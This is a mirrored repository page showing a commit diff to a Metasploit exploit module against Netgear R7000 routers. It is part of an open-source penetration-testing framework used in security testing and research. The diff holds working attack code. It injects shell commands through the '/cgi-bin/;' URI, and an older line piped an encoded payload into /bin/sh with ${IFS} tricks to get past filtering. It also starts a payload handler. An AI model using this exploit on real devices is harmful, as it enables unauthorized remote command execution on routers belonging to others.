infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updates from review 

Also testing some things, line 84 and 85 mostly
bug/bundler_fix
Carter 2017-02-17 18:29:46 -05:00 committed by GitHub
parent 3fac632ce1
commit 63d1de9acd
1 changed files with 7 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb
View File

@ -38,8 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Payload' => 'Payload' =>
{ {
'Space' => 1024, 'Space' => 1024,
'DisableNops' => true 'DisableNops' => true,
#'EncoderType' => Msf::Encoder::Type::CmdUnixIfs, 'BadChars' => "\x20"
} }
)) ))
@ -81,16 +81,16 @@ class MetasploitModule < Msf::Exploit::Remote
# Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit # Mostly from ddwrt_cgibin_exec.rb, it's essentially the same exploit
def exploit def exploit
is_vuln = check is_vuln = check
cmd = payload.encoded.unpack("C*").map{|c| "\\x%.2x" % c}.join cmd = payload.encoded # .unpack("C*").map{|c| "\\x%.2x" % c}.join
str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&" #str = "echo${IFS}-ne${IFS}\"#{cmd}\"|/bin/sh&"
print_status('Sending encoded command...') print_status('Sending encoded command...')
vprint_status("Encoded command: #{str}") vprint_status("Encoded command: #{cmd}")
send_request_raw({ 'uri' => "/cgi-bin/;#{str}" }) send_request_cgi({ 'uri' => "/cgi-bin/;#{cmd}" })
print_status('Giving the handler time to run...') print_status('Giving the handler time to run...')
handler handler
select(nil, nil, nil, 10.0) sleep(10)
end end
end end